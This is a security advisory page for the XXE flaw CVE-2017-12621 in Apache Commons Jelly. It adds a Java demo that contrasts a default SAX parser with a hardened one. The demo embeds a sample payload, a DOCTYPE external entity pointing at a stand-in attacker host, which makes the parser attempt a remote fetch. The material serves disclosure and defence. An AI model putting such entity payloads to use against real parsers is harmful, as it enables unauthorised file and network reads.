Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS02ZzMzLTgyZ2MtM3B3Nc4AAYbA
Improper Restriction of XML External Entity Reference in Jelly
When a Jelly (XML) script is parsed with Apache Xerces, a custom DOCTYPE can declare an entity with a SYSTEM identifier pointing at a URL; if that entity is then referenced in the body of the script, the parser attempts to connect to that URL during parser instantiation. Because Jelly scripts are frequently assembled from or supplied by external sources, this allows XML External Entity (XXE) attacks (the parser fetching attacker-chosen URLs) against Apache Commons Jelly before 1.0.1.
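The following is an added illustration, not code from the advisory or from the Commons Jelly project. It contains a constructed Jelly script with the DOCTYPE/SYSTEM-entity pattern the advisory describes, and parses it twice with the JDK's bundled Xerces SAX parser: once with default settings (external general entities resolved, as in the vulnerable behaviour) and once with the standard SAX hardening features. A recording EntityResolver stands in for the network so the attempted fetch of the remote URL is visible offline. The hostname attacker.example and the class and method names are assumptions for the example; whether Jelly 1.0.1 sets exactly these features is not stated on this page.

```java
import java.io.IOException;
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

public class JellyXxeDemo {

    // Constructed Jelly script (not from the advisory): a DOCTYPE declares an
    // external entity via a SYSTEM URL, and the body references it with &ext;.
    static final String JELLY =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE jelly [<!ENTITY ext SYSTEM \"http://attacker.example/probe\">]>\n" +
        "<j:jelly xmlns:j=\"jelly:core\">\n" +
        "  <j:set var=\"x\" value=\"&ext;\"/>\n" +
        "</j:jelly>\n";

    // Records every external systemId the parser asks for instead of opening
    // the network, so the attempted fetch can be observed offline.
    static class RecordingResolver implements EntityResolver {
        final List<String> requested = new ArrayList<>();
        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            requested.add(systemId);
            return new InputSource(new StringReader("")); // empty stand-in for remote content
        }
    }

    // Default configuration: external general entities are resolved, which is
    // the behaviour that makes the advisory's scenario exploitable.
    static XMLReader unsafeReader() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        return f.newSAXParser().getXMLReader();
    }

    // Hardened configuration: reject DOCTYPE entirely and, as defence in depth,
    // disable external general/parameter entities and external DTD loading.
    static XMLReader hardenedReader() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return f.newSAXParser().getXMLReader();
    }

    // Parses the script and returns the external systemIds the parser tried to
    // resolve; returns null when the parser rejected the input outright.
    static List<String> parse(XMLReader reader) {
        RecordingResolver resolver = new RecordingResolver();
        reader.setEntityResolver(resolver);
        reader.setContentHandler(new DefaultHandler());
        try {
            reader.parse(new InputSource(new StringReader(JELLY)));
            return resolver.requested;
        } catch (SAXException | IOException e) {
            System.out.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Expected: the unsafe parse reports a fetch of http://attacker.example/probe;
        // the hardened parse rejects the DOCTYPE before any entity is resolved.
        System.out.println("unsafe parser requested: " + parse(unsafeReader()));
        System.out.println("hardened parser requested: " + parse(hardenedReader()));
    }
}
```

The same check can be turned on any Jelly-consuming code path: if the XMLReader handed to the script parser does not have disallow-doctype-decl (or at least the two external-entity features switched off), any DOCTYPE in an attacker-influenced script becomes a network or file read.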
Permalink: https://github.com/advisories/GHSA-6g33-82gc-3pw5
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02ZzMzLTgyZ2MtM3B3Nc4AAYbA
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: about 2 years ago
Updated: over 1 year ago
CVSS Score: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-6g33-82gc-3pw5, CVE-2017-12621
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12621
- https://issues.apache.org/jira/browse/JELLY-293
- https://lists.apache.org/thread.html/f1fc3f2c45264af44ce782d54b5908ac95f02bf7ad88bb57bfb04b73@%3Cdev.commons.apache.org%3E
- https://web.archive.org/web/20200227144849/http://www.securityfocus.com/bid/101052
- https://web.archive.org/web/20210303081618/http://www.securitytracker.com/id/1039444
- https://github.com/advisories/GHSA-6g33-82gc-3pw5
Affected Packages
maven:commons-jelly:commons-jelly
Dependent packages: 82
Dependent repositories: 29
Downloads:
Affected Version Ranges: <= 1.0
Fixed in: 1.0.1
All affected versions: <= 1.0 (per the affected range above)
All unaffected versions: 1.0.1 (the fixed release)